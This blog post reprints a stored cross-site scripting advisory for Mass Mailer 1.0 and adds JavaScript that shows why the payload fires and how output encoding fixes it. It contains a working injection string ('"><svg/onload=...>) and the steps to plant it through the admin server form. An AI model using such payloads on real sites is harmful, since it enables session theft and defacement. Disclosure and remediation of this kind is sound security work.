Monday, 13 June 2016

Mass Mailer - Stored XSS Vuln.

11:38 Posted by Unknown
# Exploit Title: Mass Mailer Stored XSS Vuln.
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.brightery.com.eg/
# Demo Page: http://demo.brightery.com.eg/mass-mailer
# Version: 1.0

# Exploit:

< -- bug code started -- >

Go to the admin page. Add a server from the top right menu. Use the payload: '"><svg/onload=confirm(document.domain)>

Then go to http://[SITE]/[script_path]/admin/servers

Here is your alert!

< -- end of the bug code -- >

#########################
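Why the stored value fires on the servers page, and the output-encoding fix, shown as an added example that is not Mass Mailer's code: the leading `'">` closes a quoted attribute and its tag, so the encoder has to cover both quote characters as well as `<` and `>`. The row markup and the function names are assumptions, since the advisory does not show the application's template.

```javascript
// Constructed sample: the stored server name from the advisory's reproduction step.
const storedName = `'"><svg/onload=confirm(document.domain)>`;

// Encode the five characters that can change HTML parsing context.
// Suitable for element content and for quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical listing row (assumption): the name is placed in a quoted
// attribute and in the cell text. `encode` is the output filter in use.
function renderServerRow(name, encode) {
  const n = encode(name);
  return `<tr><td title="${n}">${n}</td></tr>`;
}

// Vulnerable rendering: the stored value is echoed unchanged.
function renderVulnerable(name) {
  return renderServerRow(name, (v) => v);
}

// Hardened rendering: the stored value is encoded at output time.
function renderHardened(name) {
  return renderServerRow(name, escapeHtml);
}

// Simple check for tests and review: list the opening tags present in markup.
function tagsIn(html) {
  return [...html.matchAll(/<\s*([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

console.log("vulnerable tags:", tagsIn(renderVulnerable(storedName)));
console.log("hardened tags:  ", tagsIn(renderHardened(storedName)));
console.log(renderHardened(storedName));
```

Encoding at output time also neutralises values that were stored before the fix, which input filtering alone does not.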